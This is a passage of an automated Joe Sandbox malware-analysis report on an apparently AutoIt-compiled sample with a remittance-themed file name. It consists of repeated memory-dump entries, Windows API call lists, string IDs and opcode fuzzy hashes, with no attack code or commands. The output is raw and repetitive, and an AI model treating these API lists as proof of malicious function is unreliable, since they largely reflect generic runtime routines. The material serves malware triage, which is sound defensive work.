                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                      • API String ID: 1503153545-1459072770
                                                                      • Opcode ID: 317b836bd45d303022c8cfe41fd482541af156a870e12d87d8544c7d52709fdd
                                                                      • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                      • Opcode Fuzzy Hash: 317b836bd45d303022c8cfe41fd482541af156a870e12d87d8544c7d52709fdd
                                                                      • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsicoll$__wcsnicmp
                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                      • API String ID: 790654849-32604322
                                                                      • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                      • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                      • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                      • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                                      • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                      • Opcode Fuzzy Hash: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                                      • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window
                                                                      • String ID: 0
                                                                      • API String ID: 2353593579-4108050209
                                                                      • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                      • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                      • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                      • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                      APIs
                                                                      • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                      • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                      • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                      • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                      • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                      • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                      • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                      • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                      • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                      • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                      • GetSysColor.USER32(00000008), ref: 0044A265
                                                                      • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                      • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                      • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                      • String ID:
                                                                      • API String ID: 1744303182-0
                                                                      • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                      • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                      • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                      • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                      • __mtterm.LIBCMT ref: 00417C34
                                                                        • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                        • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                      • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                      • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                      • __init_pointers.LIBCMT ref: 00417CE6
                                                                      • __calloc_crt.LIBCMT ref: 00417D54
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                      • API String ID: 4163708885-3819984048
                                                                      • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                      • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                      • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                      • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                      • API String ID: 0-1896584978
                                                                      • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                      • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                      • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                      • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsicoll$IconLoad
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 2485277191-404129466
                                                                      • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                      • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                      • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                      • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                      APIs
                                                                      • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                      • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                      • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                      • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                      • GetDesktopWindow.USER32 ref: 0045476F
                                                                      • GetWindowRect.USER32(00000000), ref: 00454776
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                      • GetClientRect.USER32(?,?), ref: 004547D2
                                                                      • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                      • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                      • String ID:
                                                                      • API String ID: 3869813825-0
                                                                      • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                      • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                      • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                      • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00464B28
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                      • _wcslen.LIBCMT ref: 00464C28
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                      • _wcslen.LIBCMT ref: 00464CBA
                                                                      • _wcslen.LIBCMT ref: 00464CD0
                                                                      • _wcslen.LIBCMT ref: 00464CEF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$Directory$CurrentSystem
                                                                      • String ID: D
                                                                      • API String ID: 1914653954-2746444292
                                                                      • Opcode ID: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                                      • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                      • Opcode Fuzzy Hash: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                                      • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                      APIs
                                                                      • _wcsncpy.LIBCMT ref: 0045CE39
                                                                      • __wsplitpath.LIBCMT ref: 0045CE78
                                                                      • _wcscat.LIBCMT ref: 0045CE8B
                                                                      • _wcscat.LIBCMT ref: 0045CE9E
                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                      • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                      • _wcscpy.LIBCMT ref: 0045CF61
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                      • String ID: *.*
                                                                      • API String ID: 1153243558-438819550
                                                                      • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                      • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                      • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                      • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsicoll
                                                                      • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                      • API String ID: 3832890014-4202584635
                                                                      • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                      • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                      • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                      • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                      • GetFocus.USER32 ref: 0046A0DD
                                                                      • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$CtrlFocus
                                                                      • String ID: 0
                                                                      • API String ID: 1534620443-4108050209
                                                                      • Opcode ID: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                                      • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                      • Opcode Fuzzy Hash: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                                      • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                      APIs
                                                                      • DestroyWindow.USER32(?), ref: 004558E3
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
